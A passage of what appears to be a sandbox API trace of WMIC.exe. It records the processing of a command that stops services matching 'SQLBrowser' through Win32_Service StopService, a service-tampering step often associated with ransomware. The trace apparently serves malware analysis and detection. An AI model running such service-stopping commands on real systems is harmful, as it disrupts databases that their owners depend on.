(param_1="TABLE") returned 0x5 [0278.002] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0278.002] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0278.002] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0278.002] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0278.002] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0278.002] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0278.002] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0278.002] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0278.002] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0278.003] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0278.003] malloc (_Size=0x18) returned 0x862c80 [0278.003] IUnknown:Release (This=0x7b6b88) returned 0x0 [0278.003] IUnknown:Release (This=0x7b9fa8) returned 0x0 [0278.003] IUnknown:Release (This=0x7b9ff8) returned 0x0 [0278.003] IUnknown:Release (This=0x7b9ca0) returned 0x0 [0278.003] FreeThreadedDOMDocument:IUnknown:Release (This=0x7b6b48) returned 0x1 [0278.003] FreeThreadedDOMDocument:IUnknown:Release (This=0x7b45a8) returned 0x0 [0278.003] free (_Block=0x8698e0) [0278.004] GetCommandLineW () returned="\"C:\\WINDOWS\\System32\\Wbem\\WMIC.exe\" path Win32_Service where \"name like '%%SQLBrowser%%'\" call stopservice" [0278.004] malloc (_Size=0xe0) returned 0x86aee8 [0278.004] memcpy_s (in: _Destination=0x86aee8, _DestinationSize=0xde, _Source=0x8a1b78, _SourceSize=0xd4 | out: _Destination=0x86aee8) returned 0x0 [0278.004] malloc (_Size=0xc) returned 0x86ac18 [0278.004] malloc (_Size=0xc) returned 0x86ab28 [0278.004] malloc (_Size=0xc) returned 0x86ab88 [0278.004] malloc (_Size=0xc) returned 0x86ac90 [0278.004] malloc (_Size=0x80) returned 0x86afd0 [0278.004] GetLocalTime (in: lpSystemTime=0x35fd30 | out: lpSystemTime=0x35fd30*(wYear=0x7e4, wMonth=0x4, wDayOfWeek=0x4, wDay=0x2, wHour=0x8, wMinute=0x1c, wSecond=0x2c, wMilliseconds=0x3a)) [0278.004] _vsnwprintf (in: _Buffer=0x86afd0, _BufferCount=0x3f, _Format="%.2d-%.2d-%.4dT%.2d:%.2d:%.2d", _ArgList=0x35fd10 | out: _Buffer="04-02-2020T08:28:44") returned 19 [0278.005] lstrlenW (lpString=" path Win32_Service where \"name like '%%SQLBrowser%%'\" call stopservice") returned 71 [0278.005] malloc (_Size=0x90) returned 0x86b058 [0278.005] lstrlenW (lpString=" path Win32_Service where \"name like '%%SQLBrowser%%'\" call stopservice") returned 71 [0278.005] lstrlenW (lpString=" path Win32_Service where \"name like '%%SQLBrowser%%'\" call stopservice") returned 71 [0278.005] malloc (_Size=0x90) returned 0x86b0f0 [0278.005] lstrlenW (lpString=" path Win32_Service where \"name like '%%SQLBrowser%%'\" call stopservice") returned 71 [0278.005] lstrlenW (lpString=" path Win32_Service where \"name like '%%SQLBrowser%%'\" call stopservice") returned 71 [0278.005] lstrlenW (lpString=" path Win32_Service where \"name like '%%SQLBrowser%%'\" call stopservice") returned 71 [0278.005] malloc (_Size=0xa) returned 0x86ab40 [0278.005] lstrlenW (lpString="path") returned 4 [0278.005] _wcsicmp (_String1="path", _String2="\"NULL\"") returned 78 [0278.005] malloc (_Size=0xa) returned 0x86ad68 [0278.005] malloc (_Size=0x4) returned 0x862ee8 [0278.005] free (_Block=0x0) [0278.005] free (_Block=0x86ab40) [0278.005] lstrlenW (lpString=" path Win32_Service where \"name like '%%SQLBrowser%%'\" call stopservice") returned 71 [0278.005] malloc (_Size=0x1c) returned 0x869da8 [0278.006] lstrlenW (lpString="Win32_Service") returned 13 [0278.006] _wcsicmp (_String1="Win32_Service", _String2="\"NULL\"") returned 85 [0278.006] malloc (_Size=0x1c) returned 0x860568 [0278.006] malloc (_Size=0x8) returned 0x860590 [0278.006] memmove_s (in: _Destination=0x860590, _DestinationSize=0x4, _Source=0x862ee8, _SourceSize=0x4 | out: _Destination=0x860590) returned 0x0 [0278.006] free (_Block=0x862ee8) [0278.006] free (_Block=0x0) [0278.006] free (_Block=0x869da8) [0278.006] lstrlenW (lpString=" path Win32_Service where \"name like '%%SQLBrowser%%'\" call stopservice") returned 71 [0278.006] malloc (_Size=0xc) returned 0x86ad20 [0278.006] lstrlenW (lpString="where") returned 5 [0278.006] _wcsicmp (_String1="where", _String2="\"NULL\"") returned 85 [0278.006] malloc (_Size=0xc) returned 0x86ad08 [0278.006] malloc (_Size=0xc) returned 0x86adc8 [0278.006] memmove_s (in: _Destination=0x86adc8, _DestinationSize=0x8, _Source=0x860590, _SourceSize=0x8 | out: _Destination=0x86adc8) returned 0x0 [0278.006] free (_Block=0x860590) [0278.007] free (_Block=0x0) [0278.007] free (_Block=0x86ad20) [0278.007] lstrlenW (lpString=" path Win32_Service where \"name like '%%SQLBrowser%%'\" call stopservice") returned 71 [0278.007] malloc (_Size=0x3a) returned 0x86b188 [0278.007] lstrlenW (lpString="\"name like '%%SQLBrowser%%'\"") returned 28 [0278.007] _wcsicmp (_String1="\"name like '%%SQLBrowser%%'\"", _String2="\"NULL\"") returned -20 [0278.007] lstrlenW (lpString="\"name like '%%SQLBrowser%%'\"") returned 28 [0278.007] lstrlenW (lpString="\"name like '%%SQLBrowser%%'\"") returned 28 [0278.007] malloc (_Size=0x3a) returned 0x86b1d0 [0278.007] malloc (_Size=0x10) returned 0x86ab58 [0278.007] memmove_s (in: _Destination=0x86ab58, _DestinationSize=0xc, _Source=0x86adc8, _SourceSize=0xc | out: _Destination=0x86ab58) returned 0x0 [0278.007] free (_Block=0x86adc8) [0278.007] free (_Block=0x0) [0278.007] free (_Block=0x86b188) [0278.007] lstrlenW (lpString=" path Win32_Service where \"name like '%%SQLBrowser%%'\" call stopservice") returned 71 [0278.007] malloc (_Size=0xa) returned 0x86adc8 [0278.008] lstrlenW (lpString="call") returned 4 [0278.008] _wcsicmp (_String1="call", _String2="\"NULL\"") returned 65 [0278.008] malloc (_Size=0xa) returned 0x86ac30 [0278.008] malloc (_Size=0x18) returned 0x862ce0 [0278.008] memmove_s (in: _Destination=0x862ce0, _DestinationSize=0x10, _Source=0x86ab58, _SourceSize=0x10 | out: _Destination=0x862ce0) returned 0x0 [0278.008] free (_Block=0x86ab58) [0278.008] free (_Block=0x0) [0278.008] free (_Block=0x86adc8) [0278.008] lstrlenW (lpString=" path Win32_Service where \"name like '%%SQLBrowser%%'\" call stopservice") returned 71 [0278.008] malloc (_Size=0x18) returned 0x8629a0 [0278.008] lstrlenW (lpString="stopservice") returned 11 [0278.008] _wcsicmp (_String1="stopservice", _String2="\"NULL\"") returned 81 [0278.008] malloc (_Size=0x18) returned 0x862d00 [0278.008] free (_Block=0x0) [0278.008] free (_Block=0x8629a0) [0278.008] malloc (_Size=0x18) returned 0x862a80 [0278.009] lstrlenW (lpString="QUIT") returned 4 [0278.009] lstrlenW (lpString="path") returned 4 [0278.009] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="path", cchCount1=4, lpString2="QUIT", cchCount2=4) returned 1 [0278.009] lstrlenW (lpString="EXIT") returned 4 [0278.009] lstrlenW (lpString="path") returned 4 [0278.009] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="path", cchCount1=4, lpString2="EXIT", cchCount2=4) returned 3 [0278.009] free (_Block=0x862a80) [0278.009] WbemLocator:IUnknown:AddRef (This=0x8b4920) returned 0x2 [0278.009] malloc (_Size=0x18) returned 0x8629a0 [0278.009] lstrlenW (lpString="/") returned 1 [0278.009] lstrlenW (lpString="path") returned 4 [0278.009] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="path", cchCount1=4, lpString2="/", cchCount2=1) returned 3 [0278.009] lstrlenW (lpString="-") returned 1 [0278.009] lstrlenW (lpString="path") returned 4 [0278.009] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="path", cchCount1=4, lpString2="-", cchCount2=1) returned 3 [0278.009] lstrlenW (lpString="CLASS") returned 5 [0278.009] lstrlenW (lpString="path") returned 4 [0278.009] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="path", cchCount1=4, lpString2="CLASS", cchCount2=5) returned 3 [0278.010] lstrlenW (lpString="PATH") returned 4 [0278.010] lstrlenW (lpString="path") returned 4 [0278.010] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="path", cchCount1=4, lpString2="PATH", cchCount2=4) returned 2 [0278.010] lstrlenW (lpString="/") returned 1 [0278.010] lstrlenW (lpString="Win32_Service") returned 13 [0278.010] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Win32_Service", cchCount1=13, lpString2="/", cchCount2=1) returned 3 [0278.010] lstrlenW (lpString="-") returned 1 [0278.010] lstrlenW (lpString="Win32_Service") returned 13 [0278.010] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Win32_Service", cchCount1=13, lpString2="-", cchCount2=1) returned 3 [0278.010] lstrlenW (lpString="Win32_Service") returned 13 [0278.010] malloc (_Size=0x1c) returned 0x869da8 [0278.010] lstrlenW (lpString="Win32_Service") returned 13 [0278.011] wcstok (in: _String="Win32_Service", _Delimiter=".", _Context=0x368e1e4a | out: _String="Win32_Service", _Context=0x368e1e4a) returned="Win32_Service" [0278.011] lstrlenW (lpString="Win32_Service") returned 13 [0278.011] malloc (_Size=0x1c) returned 0x86b188 [0278.011] lstrlenW (lpString="Win32_Service") returned 13 [0278.011] wcstok (in: _String=0x0, _Delimiter=",", _Context=0x368e1e4a | out: _String=0x0, _Context=0x368e1e4a) returned 0x0 [0278.011] lstrlenW (lpString="") returned 0 [0278.011] lstrlenW (lpString="WHERE") returned 5 [0278.011] lstrlenW (lpString="where") returned 5 [0278.011] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="where", cchCount1=5, lpString2="WHERE", cchCount2=5) returned 2 [0278.011] lstrlenW (lpString="/") returned 1 [0278.011] lstrlenW (lpString="name like '%%SQLBrowser%%'") returned 26 [0278.012] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="name like '%%SQLBrowser%%'", cchCount1=26, lpString2="/", cchCount2=1) returned 3 [0278.012] lstrlenW (lpString="-") returned 1 [0278.012] lstrlenW (lpString="name like '%%SQLBrowser%%'") returned 26 [0278.012] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="name like '%%SQLBrowser%%'", cchCount1=26, lpString2="-", cchCount2=1) returned 3 [0278.012] lstrlenW (lpString="name like '%%SQLBrowser%%'") returned 26 [0278.012] malloc (_Size=0x36) returned 0x86b218 [0278.012] lstrlenW (lpString="name like '%%SQLBrowser%%'") returned 26 [0278.012] lstrlenW (lpString="/") returned 1 [0278.012] lstrlenW (lpString="call") returned 4 [0278.012] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="/", cchCount2=1) returned 3 [0278.012] lstrlenW (lpString="-") returned 1 [0278.012] lstrlenW (lpString="call") returned 4 [0278.012] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="-", cchCount2=1) returned 3 [0278.012] lstrlenW (lpString="call") returned 4 [0278.012] malloc (_Size=0xa) returned 0x86ac48 [0278.012] lstrlenW (lpString="call") returned 4 [0278.012] lstrlenW (lpString="GET") returned 3 [0278.012] lstrlenW (lpString="call") returned 4 [0278.013] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="GET", cchCount2=3) returned 1 [0278.013] lstrlenW (lpString="LIST") returned 4 [0278.013] lstrlenW (lpString="call") returned 4 [0278.013] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="LIST", cchCount2=4) returned 1 [0278.013] lstrlenW (lpString="SET") returned 3 [0278.013] lstrlenW (lpString="call") returned 4 [0278.013] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="SET", cchCount2=3) returned 1 [0278.013] lstrlenW (lpString="CREATE") returned 6 [0278.013] lstrlenW (lpString="call") returned 4 [0278.013] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="CREATE", cchCount2=6) returned 1 [0278.013] lstrlenW (lpString="CALL") returned 4 [0278.013] lstrlenW (lpString="call") returned 4 [0278.013] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="CALL", cchCount2=4) returned 2 [0278.013] lstrlenW (lpString="/") returned 1 [0278.013] lstrlenW (lpString="stopservice") returned 11 [0278.013] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="/", cchCount2=1) returned 3 [0278.013] lstrlenW (lpString="-") returned 1 [0278.013] lstrlenW (lpString="stopservice") returned 11 [0278.013] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="-", cchCount2=1) returned 3 [0278.014] lstrlenW (lpString="stopservice") returned 11 [0278.014] malloc (_Size=0x18) returned 0x862d20 [0278.014] lstrlenW (lpString="stopservice") returned 11 [0278.014] ??0CHString@@QAE@XZ () returned 0x35dbf4 [0278.014] GetCurrentThreadId () returned 0x518 [0278.014] GetCurrentThreadId () returned 0x518 [0278.014] ??0CHString@@QAE@XZ () returned 0x35db7c [0278.014] malloc (_Size=0x4) returned 0x862ee8 [0278.014] malloc (_Size=0xc) returned 0x86abd0 [0278.014] malloc (_Size=0xc) returned 0x86ad20 [0278.014] WbemLocator:IWbemLocator:ConnectServer (in: This=0x8b4920, strNetworkResource="root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0xa68518 | out: ppNamespace=0xa68518*=0x8bac48) returned 0x0 [0278.087] free (_Block=0x86ad20) [0278.087] CoSetProxyBlanket (pProxy=0x8bac48, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0278.088] free (_Block=0x862ee8) [0278.088] ??1CHString@@QAE@XZ () returned 0x6d7c65f8 [0278.088] free (_Block=0x86abd0) [0278.088] malloc (_Size=0xc) returned 0x86ad20 [0278.088] IWbemServices:GetObject (in: This=0x8bac48, strObjectPath="Win32_Service", lFlags=131072, pCtx=0x0, ppObject=0x35dc0c*=0x0, ppCallResult=0x0 | out: ppObject=0x35dc0c*=0x910088, ppCallResult=0x0) returned 0x0 [0278.171] free (_Block=0x86ad20) [0278.171] IWbemClassObject:BeginMethodEnumeration (This=0x910088, lEnumFlags=0) returned 0x0 [0278.171] IWbemClassObject:NextMethod (in: This=0x910088, lFlags=0, pstrName=0x35dc18*=0x0, ppInSignature=0x35dc14*=0x0, ppOutSignature=0x35dc10*=0x0 | out: pstrName=0x35dc18*="StartService", ppInSignature=0x35dc14*=0x0, ppOutSignature=0x35dc10*=0x910280) returned 0x0 [0278.171] lstrlenW (lpString="StartService") returned 12 [0278.171] lstrlenW (lpString="stopservice") returned 11 [0278.172] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="StartService", cchCount2=12) returned 3 [0278.172] IUnknown:Release (This=0x910280) returned 0x0 [0278.172] IWbemClassObject:NextMethod (in: This=0x910088, lFlags=0, pstrName=0x35dc18*=0x0, ppInSignature=0x35dc14*=0x0, ppOutSignature=0x35dc10*=0x0 | out: pstrName=0x35dc18*="StopService", ppInSignature=0x35dc14*=0x0, ppOutSignature=0x35dc10*=0x910280) returned 0x0 [0278.172] lstrlenW (lpString="StopService") returned 11 [0278.172] lstrlenW (lpString="stopservice") returned 11 [0278.172] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="StopService", cchCount2=11) returned 2 [0278.172] malloc (_Size=0x38) returned 0x86b9c8 [0278.172] ??0CHString@@QAE@XZ () returned 0x35d75c [0278.172] GetCurrentThreadId () returned 0x518 [0278.172] IWbemClassObject:GetNames (in: This=0x910280, wszQualifierName=0x0, lFlags=64, pQualifierVal=0x0, pNames=0x35d76c | out: pNames=0x35d76c*="\x01ƀ\x04") returned 0x0 [0278.173] SafeArrayGetLBound (in: psa=0x910ae8, nDim=0x1, plLbound=0x35d758 | out: plLbound=0x35d758) returned 0x0 [0278.173] SafeArrayGetUBound (in: psa=0x910ae8, nDim=0x1, plUbound=0x35d754 | out: plUbound=0x35d754) returned 0x0 [0278.173] SafeArrayGetElement (in: psa=0x910ae8, rgIndices=0x35d760, pv=0x35d770 | out: pv=0x35d770) returned 0x0 [0278.173] malloc (_Size=0x24) returned 0x86ba08 [0278.173] IWbemClassObject:GetPropertyQualifierSet (in: This=0x910280, wszProperty="ReturnValue", ppQualSet=0x35d680 | out: ppQualSet=0x35d680*=0x8baa78) returned 0x0 [0278.174] malloc (_Size=0xc) returned 0x86adc8 [0278.196] IWbemQualifierSet:Get (in: This=0x8baa78, wszName="CIMTYPE", lFlags=0, pVal=0x35d650*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0 | out: pVal=0x35d650*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="uint32", varVal2=0x0), plFlavor=0x0) returned 0x0 [0278.197] free (_Block=0x86adc8) [0278.197] malloc (_Size=0xc) returned 0x86adc8 [0278.198] IWbemClassObject:Get (in: This=0x910280, wszName="ReturnValue", lFlags=0, pVal=0x35d628*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x35d664*=3528268, plFlavor=0x0 | out: pVal=0x35d628*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x35d664*=19, plFlavor=0x0) returned 0x0 [0278.198] malloc (_Size=0xc) returned 0x86ad20 [0278.198] IWbemQualifierSet:Get (in: This=0x8baa78, wszName="read", lFlags=0, pVal=0x35d668*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0 | out: pVal=0x35d668*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0) returned 0x80041002 [0278.198] free (_Block=0x86ad20) [0278.198] malloc (_Size=0xc) returned 0x86ad20 [0278.198] IWbemQualifierSet:Get (in: This=0x8baa78, wszName="write", lFlags=0, pVal=0x35d668*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0 | out: pVal=0x35d668*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0) returned 0x80041002 [0278.198] free (_Block=0x86ad20) [0278.198] malloc (_Size=0xc) returned 0x86ade0 [0278.199] malloc (_Size=0xc) returned 0x86ad20 [0278.199] IWbemQualifierSet:Get (in: This=0x8baa78, wszName="Description", lFlags=0, pVal=0x35d640*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0 | out: pVal=0x35d640*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0) returned 0x80041002 [0278.199] free (_Block=0x86ad20) [0278.199] malloc (_Size=0xc) returned 0x86ad20 [0278.199] lstrlenA (lpString="Not Available") returned 13 [0278.199] malloc (_Size=0x1c) returned 0x86ba38 [0278.199] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa21d94, cbMultiByte=-1, lpWideCharStr=0x86ba38, cchWideChar=14 | out: lpWideCharStr="Not Available") returned 14 [0278.199] free (_Block=0x86ba38) [0278.199] IUnknown:Release (This=0x8baa78) returned 0x0 [0278.199] malloc (_Size=0x24) returned 0x86ba38 [0278.199] malloc (_Size=0xc) returned 0x86adf8 [0278.228] malloc (_Size=0x24) returned 0x86ba68 [0278.230] malloc (_Size=0x38) returned 0x86ba98 [0278.230] malloc (_Size=0x24) returned 0x86bad8 [0278.230] free (_Block=0x86ba68) [0278.230] free (_Block=0x86ba38) [0278.230] free (_Block=0x86ba08) [0278.230] free (_Block=0x86ade0) [0278.230] free (_Block=0x86ad20) [0278.230] ??1CHString@@QAE@XZ () returned 0x6d7c65f8 [0278.231] IWbemClassObject:GetMethodQualifierSet (in: This=0x910088, wszMethod="StopService", ppQualSet=0x35db74 | out: ppQualSet=0x35db74*=0x8e3ff0) returned 0x0 [0278.231] malloc (_Size=0xc) returned 0x86ad20 [0278.231] IWbemQualifierSet:Get (in: This=0x8e3ff0, wszName="Implemented", lFlags=0, pVal=0x35db5c*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0 | out: pVal=0x35db5c*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0) returned 0x80041002 [0278.231] free (_Block=0x86ad20) [0278.231] malloc (_Size=0xc) returned 0x86ad20 [0278.231] malloc (_Size=0xc) returned 0x86ab58 [0278.232] IWbemQualifierSet:Get (in: This=0x8e3ff0, wszName="Description", lFlags=0, pVal=0x35db4c*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0 | out: pVal=0x35db4c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="The StopService method places the service in the stopped state. It returns an integer value of 0 if the service was successfully stopped, 1 if the request is not supported, and any other number to indicate an error. It returns one of the following integer values:\n0 - The request was accepted.\n1 - The request is not supported.\n2 - The user did not have the necessary access.\n3 - The service cannot be stopped because other services that are running are dependent on it.\n4 - The requested control code is not valid, or it is unacceptable to the service.\n5 - The requested control code cannot be sent to the service because the state of the service (Win32_BaseService:State) is equal to 0, 1, or 2.\n6 - The service has not been started.\n7 - The service did not respond to the start request in a timely fashion.\n8 - Unknown failure when starting the service.\n9 - The directory path to the service executable was not found.\n10 - The service is already running.\n11 - The database to add a new service is locked.\n12 - A dependency for which this service relies on has been removed from the system.\n13 - The service failed to find the service needed from a dependent service.\n14 - The service has been disabled from the system.\n15 - The service does not have the correct authentication to run on the system.\n16 - This service is being removed from the system.\n17 - There is no execution thread for the service.\n18 - There are circular dependencies when starting the service.\n19 - There is a service running under the same name.\n20 - There are invalid characters in the name of the service.\n21 - Invalid parameters have been passed to the service.\n22 - The account, which this service is to run under is either invalid or lacks the permissions to run the service.\n23 - The service exists in the database of services available from the system.\n24 - The service is currently paused in the system.\nOther - For integer values other than those listed above, refer to Win32 error code documentation.", varVal2=0x0), plFlavor=0x0) returned 0x0 [0278.232] free (_Block=0x86ab58) [0278.233] malloc (_Size=0xc) returned 0x86ade0 [0278.233] IUnknown:Release (This=0x8e3ff0) returned 0x0 [0278.233] malloc (_Size=0x38) returned 0x86ba08 [0278.233] malloc (_Size=0x38) returned 0x86ba48 [0278.233] malloc (_Size=0x24) returned 0x86bb08 [0278.233] malloc (_Size=0xc) returned 0x86ab10 [0278.233] malloc (_Size=0x38) returned 0x86bb38 [0278.233] malloc (_Size=0x38) returned 0x86bb78 [0278.233] malloc (_Size=0x24) returned 0x86bbb8 [0278.233] malloc (_Size=0x28) returned 0x86bbe8 [0278.233] malloc (_Size=0x38) returned 0x86bc18 [0278.233] malloc (_Size=0x38) returned 0x86bc58 [0278.233] malloc (_Size=0x24) returned 0x86bc98 [0278.233] free (_Block=0x86bbb8) [0278.233] free (_Block=0x86bb78) [0278.234] free (_Block=0x86bb38) [0278.234] free (_Block=0x86bb08) [0278.234] free (_Block=0x86ba48) [0278.234] free (_Block=0x86ba08) [0278.234] IUnknown:Release (This=0x910280) returned 0x0 [0278.234] free (_Block=0x86bad8) [0278.234] free (_Block=0x86ba98) [0278.234] free (_Block=0x86b9c8) [0278.239] IWbemClassObject:NextMethod (in: This=0x910088, lFlags=0, pstrName=0x35dc18*=0x0, ppInSignature=0x35dc14*=0x0, ppOutSignature=0x35dc10*=0x0 | out: pstrName=0x35dc18*="PauseService", ppInSignature=0x35dc14*=0x0, ppOutSignature=0x35dc10*=0x8e6ba8) returned 0x0 [0278.239] lstrlenW (lpString="PauseService") returned 12 [0278.239] lstrlenW (lpString="stopservice") returned 11 [0278.239] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="PauseService", cchCount2=12) returned 3 [0278.239] IUnknown:Release (This=0x8e6ba8) returned 0x0 [0278.239] IWbemClassObject:NextMethod (in: This=0x910088, lFlags=0, pstrName=0x35dc18*=0x0, ppInSignature=0x35dc14*=0x0, ppOutSignature=0x35dc10*=0x0 | out: pstrName=0x35dc18*="ResumeService", ppInSignature=0x35dc14*=0x0, ppOutSignature=0x35dc10*=0x8e6ba8) returned 0x0 [0278.239] lstrlenW (lpString="ResumeService") returned 13 [0278.240] lstrlenW (lpString="stopservice") returned 11 [0278.240] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="ResumeService", cchCount2=13) returned 3 [0278.240] IUnknown:Release (This=0x8e6ba8) returned 0x0 [0278.240] IWbemClassObject:NextMethod (in: This=0x910088, lFlags=0, pstrName=0x35dc18*=0x0, ppInSignature=0x35dc14*=0x0, ppOutSignature=0x35dc10*=0x0 | out: pstrName=0x35dc18*="InterrogateService", ppInSignature=0x35dc14*=0x0, ppOutSignature=0x35dc10*=0x8e6ba8) returned 0x0 [0278.240] lstrlenW (lpString="InterrogateService") returned 18 [0278.240] lstrlenW (lpString="stopservice") returned 11 [0278.240] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="InterrogateService", cchCount2=18) returned 3 [0278.240] IUnknown:Release (This=0x8e6ba8) returned 0x0 [0278.240] IWbemClassObject:NextMethod (in: This=0x910088, lFlags=0, pstrName=0x35dc18*=0x0, ppInSignature=0x35dc14*=0x0, ppOutSignature=0x35dc10*=0x0 | out: pstrName=0x35dc18*="UserControlService", ppInSignature=0x35dc14*=0x910280, ppOutSignature=0x35dc10*=0x912d38) returned 0x0 [0278.240] lstrlenW (lpString="UserControlService") returned 18 [0278.240] lstrlenW (lpString="stopservice") returned 11 [0278.240] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="UserControlService", cchCount2=18) returned 1 [0278.241] IUnknown:Release (This=0x910280) returned 0x0 [0278.241] IUnknown:Release (This=0x912d38) returned 0x0 [0278.241] IWbemClassObject:NextMethod (in: This=0x910088, lFlags=0, pstrName=0x35dc18*=0x0, ppInSignature=0x35dc14*=0x0, ppOutSignature=0x35dc10*=0x0 | out: pstrName=0x35dc18*="Create", ppInSignature=0x35dc14*=0x910280, ppOutSignature=0x35dc10*=0x914d08) returned 0x0 [0278.241] lstrlenW (lpString="Create") returned 6 [0278.242] lstrlenW (lpString="stopservice") returned 11 [0278.242] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="Create", cchCount2=6) returned 3 [0278.242] IUnknown:Release (This=0x910280) returned 0x0 [0278.242] IUnknown:Release (This=0x914d08) returned 0x0 [0278.242] IWbemClassObject:NextMethod (in: This=0x910088, lFlags=0, pstrName=0x35dc18*=0x0, ppInSignature=0x35dc14*=0x0, ppOutSignature=0x35dc10*=0x0 | out: pstrName=0x35dc18*="Change", ppInSignature=0x35dc14*=0x910280, ppOutSignature=0x35dc10*=0x914a88) returned 0x0 [0278.242] lstrlenW (lpString="Change") returned 6 [0278.242] lstrlenW (lpString="stopservice") returned 11 [0278.242] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="Change", cchCount2=6) returned 3 [0278.242] IUnknown:Release (This=0x910280) returned 0x0 [0278.242] IUnknown:Release (This=0x914a88) returned 0x0 [0278.242] IWbemClassObject:NextMethod (in: This=0x910088, lFlags=0, pstrName=0x35dc18*=0x0, ppInSignature=0x35dc14*=0x0, ppOutSignature=0x35dc10*=0x0 | out: pstrName=0x35dc18*="ChangeStartMode", ppInSignature=0x35dc14*=0x910280, ppOutSignature=0x35dc10*=0x912ea8) returned 0x0 [0278.243] lstrlenW (lpString="ChangeStartMode") returned 15 [0278.243] lstrlenW (lpString="stopservice") returned 11 [0278.243] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="ChangeStartMode", cchCount2=15) returned 3 [0278.243] IUnknown:Release (This=0x910280) returned 0x0 [0278.243] IUnknown:Release (This=0x912ea8) returned 0x0 [0278.243] IWbemClassObject:NextMethod (in: This=0x910088, lFlags=0, pstrName=0x35dc18*=0x0, ppInSignature=0x35dc14*=0x0, ppOutSignature=0x35dc10*=0x0 | out: pstrName=0x35dc18*="Delete", ppInSignature=0x35dc14*=0x0, ppOutSignature=0x35dc10*=0x8e6ba8) returned 0x0 [0278.243] lstrlenW (lpString="Delete") returned 6 [0278.243] lstrlenW (lpString="stopservice") returned 11 [0278.243] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="Delete", cchCount2=6) returned 3 [0278.243] IUnknown:Release (This=0x8e6ba8) returned 0x0 [0278.243] 